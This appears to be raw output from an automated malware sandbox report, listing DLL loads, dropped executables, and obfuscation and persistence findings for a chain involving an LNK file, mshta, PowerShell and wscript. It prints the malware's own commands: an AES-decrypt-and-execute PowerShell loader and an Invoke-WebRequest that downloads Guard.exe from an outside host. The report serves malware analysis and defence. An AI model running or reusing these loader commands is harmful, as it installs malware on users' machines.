Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: FzmtNV0vnG.lnk | LNK file: ..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2128979328.000002428AD54000.00000004.00000020.00020000.00000000.sdmp, baochuan1[1].6.dr
Source: Binary string: sethc.pdb source: baochuan1[1].6.dr

Data Obfuscation

Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg [...] function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe""
Source: baochuan1[1].6.dr | Static PE information: 0xDA18FDB4 [Thu Dec 13 08:35:00 2085 UTC]
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB8532F4 LoadLibraryA,GetProcAddress,15_2_00007FF7BB8532F4
Source: baochuan1[1].6.dr | Static PE information: real checksum: 0x20826 should be: 0x735fd
Source: baochuan1[1].6.dr | Static PE information: section name: .didat
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB817399 push rdi; ret 15_2_00007FF7BB8173A2
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB8178FD push rdi; ret 15_2_00007FF7BB817904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FF8485800BD pushad ; iretd 20_2_00007FF8485800C1

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: LNK file | Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\Public\Guard.exe | File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\baochuan1[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Guard.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB804514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00007FF7BB804514
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1252
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1116
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 446
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3785
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6004
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4701
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5333
Source: C:\Windows\System32\mshta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\baochuan1[1]
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe API coverage: 3.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476 Thread sleep count: 1116 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436 Thread sleep count: 446 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1276 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 Thread sleep count: 4701 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep count: 2618 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 Thread sleep count: 3280 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 5333 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB85C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_00007FF7BB85C7C0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Code function: 15_2_00007FF7BB85BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7BB85BC70
